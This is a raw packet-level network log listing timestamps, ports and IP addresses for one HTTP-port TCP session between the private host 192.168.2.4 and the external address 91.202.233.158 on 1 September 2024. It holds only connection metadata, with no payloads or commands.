Sep 1, 2024 18:28:23.255002022 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255012035 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255019903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255037069 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255050898 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255065918 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255090952 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255100965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255110979 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255119085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255127907 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255136013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255141973 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255151033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255157948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255167007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255173922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255182981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255192041 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255198956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255206108 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255220890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255234003 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255354881 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255392075 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255413055 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255424023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255434990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255448103 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255454063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255465031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255470037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.255491018 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.255517006 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.327171087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327183008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327204943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327214956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327225924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327235937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327249050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327389956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327402115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327508926 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327521086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327529907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327541113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327552080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327562094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327573061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327722073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327774048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327785969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327796936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327900887 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327909946 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327919960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327935934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327944994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.327955961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328197002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328207970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328217983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328227997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328238964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328248978 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328259945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328270912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328282118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328291893 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328547955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328558922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328568935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328579903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328591108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328602076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328614950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328820944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328831911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328841925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328852892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328870058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.328880072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329143047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329153061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329163074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329174042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329189062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329200029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329210043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329220057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329231024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329240084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329252958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329262018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329273939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.329284906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.330106020 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.330290079 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.340279102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.340408087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.340418100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.340476036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:23.340517044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:23.340552092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.053611040 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.058509111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310746908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310760021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310769081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310777903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310792923 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310806036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.310812950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310823917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310836077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310841084 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.310856104 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.310870886 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.310925007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310935020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310945034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.310967922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.310990095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311151981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311165094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311175108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311182976 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311191082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311198950 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311208010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311213970 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311220884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311229944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311238050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311245918 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311256886 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311261892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311280012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311300993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311819077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311827898 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311834097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311836004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311841965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311851025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311860085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311868906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311882019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311888933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311897993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311904907 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311913013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311918974 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311927080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311938047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311949015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311956882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311969995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311974049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311980963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.311988115 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.311995983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312009096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312012911 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312021971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312027931 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312036037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312045097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312067986 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312473059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312494993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312501907 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312509060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312519073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312526941 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312540054 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312545061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312551975 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312558889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312568903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312576056 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312583923 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312589884 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312597990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312604904 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312612057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312619925 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312628031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312635899 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312643051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312649965 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312657118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312669992 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312675953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312683105 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312690020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312701941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312706947 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312716007 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312721014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312731028 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312738895 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312745094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312755108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312763929 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312768936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.312788010 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.312800884 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.313023090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.313062906 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.408474922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.408500910 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.408509016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.408545017 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.408561945 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.408979893 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.408989906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.408998966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409008980 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409018993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409024954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409034967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409044981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409051895 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409060001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409073114 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409080029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409087896 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409096956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409106970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409113884 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409126997 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409141064 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409282923 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409293890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409301996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409312963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409321070 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409328938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409336090 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409343958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409353971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409359932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409378052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409399986 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409569025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409579039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409588099 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409599066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409603119 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409610033 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409616947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409624100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409631968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409651995 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409668922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409723997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409734964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409743071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409751892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409761906 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409768105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409780025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409785986 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409794092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.409801960 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.409826994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.411870003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.411880016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.411889076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.411910057 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.411925077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412060022 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412070036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412077904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412087917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412098885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412102938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412112951 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412120104 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412142992 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412184954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412194014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412203074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412213087 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412219048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412229061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412256002 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412544966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412554026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412563086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412571907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412580013 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412591934 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412596941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412605047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412612915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412620068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412630081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412638903 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412662983 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412674904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412684917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412693977 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412704945 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412713051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412722111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412729025 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412755966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412832022 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412842035 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412849903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412858963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412869930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412878990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412884951 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412893057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412900925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412908077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412915945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412923098 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412930965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412941933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412946939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.412961960 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.412993908 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413125038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413163900 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:24.413280010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413289070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413297892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:24.413306952 CEST	56177	80	192.168.2.4	91.202.233.158
